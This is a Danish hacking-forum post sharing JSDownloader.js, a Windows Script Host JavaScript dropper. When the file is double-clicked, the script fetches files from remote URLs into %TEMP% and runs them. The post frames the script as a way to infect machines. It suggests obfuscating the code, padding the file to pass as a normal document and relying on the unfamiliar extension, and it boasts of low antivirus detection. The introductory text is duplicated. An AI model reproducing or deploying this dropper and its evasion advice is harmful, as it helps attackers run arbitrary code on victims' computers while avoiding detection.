11-07-2016, 17:36
Eftersom vi allerede har en tråd omhandlende infektion med batch liggende her:
https://www.shellsec.pw/traad-simpelt-fu...le-dropper
Tænkte jeg, at jeg lige så godt kunne dele dette javascript - script...
Det sidste stykke tid er der dukket en del artikler op, der handler om inficering ved hjælp af Javascript-filer.
Her er et eksempel fra v2: https://www.version2.dk/artikel/sophos-r...ler-737254
Disse scripts køres altså ikke på nettet, men til gengæld på maskinen selv, ved hjælp af Windows Script Host.
Nedenstående script vil downloade og køre Putty.exe samt Demystifying_Google_Hacks.doc(Hvis man har et program, såsom Word, til at håndtere filtypen), når der dobbelt-klikkes på det.
Jeg tror ikke scriptet behøver videre forklaring, da det absolut giver sig selv. Der er ikke mulighed for at ændre ikon, som vi kender det fra eksekverbare filer, men jeg tror stadig den 'mindre kendte' filtype/endelse opvejer den negativ.
JSDownloader.js
Mulige forbedringer og bemærkninger:
- Man kunne i stedet køre en loop hvis der skal hentes flere filer
- Man kunne bruge obfuscation, da dette er trivielt nemt i Javascript
- Man kan pumpe filstørrelsen, så den stemmer mere overens med et normalt dokument
6/55 på VirusTotal:
https://virustotal.com/da/file/93d421adc...468251292/
https://www.shellsec.pw/traad-simpelt-fu...le-dropper
Tænkte jeg, at jeg lige så godt kunne dele dette javascript - script...
Det sidste stykke tid er der dukket en del artikler op, der handler om inficering ved hjælp af Javascript-filer.
Her er et eksempel fra v2: https://www.version2.dk/artikel/sophos-r...ler-737254
Disse scripts køres altså ikke på nettet, men til gengæld på maskinen selv, ved hjælp af Windows Script Host.
Nedenstående script vil downloade og køre Putty.exe samt Demystifying_Google_Hacks.doc(Hvis man har et program, såsom Word, til at håndtere filtypen), når der dobbelt-klikkes på det.
Jeg tror ikke scriptet behøver videre forklaring, da det absolut giver sig selv. Der er ikke mulighed for at ændre ikon, som vi kender det fra eksekverbare filer, men jeg tror stadig den 'mindre kendte' filtype/endelse opvejer den negativ.
JSDownloader.js
Kode:
var activeX= this['ActiveXObject'];
var wShell = new activeX('WScript.Shell');
var cObject = WScript.CreateObject('MSXML2.XMLHTTP');
hentFil('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', gemSom('putty.exe'));
hentFil('http://www.infosecwriters.com/text_resources/doc/Demystifying_Google_Hacks.doc', gemSom('doc.doc'));
function hentFil(fil, mappe){
cObject.Open('GET', fil, false);
cObject.Send();
if (cObject.Status == 200)
{
var Stream = WScript.CreateObject('ADODB.Stream');
var i = Stream.Open();
var o = Stream.Type = 1; // adTypeBinary
var u = Stream.Write(cObject.ResponseBody);
var y = Stream.Position = 0;
var File = WScript.CreateObject('Scripting.FileSystemObject');
if (File.FileExists(mappe))
{
File.DeleteFile(mappe);
}
Stream.SaveToFile(mappe, 2); // adSaveCreateOverWrite
Stream.Close();
var objShell = new ActiveXObject("WScript.shell");
objShell.run(mappe);
}
}
function gemSom(filNavn){
var tempMappe = wShell['ExpandEnvironmentStrings']('%TEMP%') + '/';
return tempMappe + filNavn;
}
Mulige forbedringer og bemærkninger:
- Man kunne i stedet køre en loop hvis der skal hentes flere filer
- Man kunne bruge obfuscation, da dette er trivielt nemt i Javascript
- Man kan pumpe filstørrelsen, så den stemmer mere overens med et normalt dokument
6/55 på VirusTotal:
https://virustotal.com/da/file/93d421adc...468251292/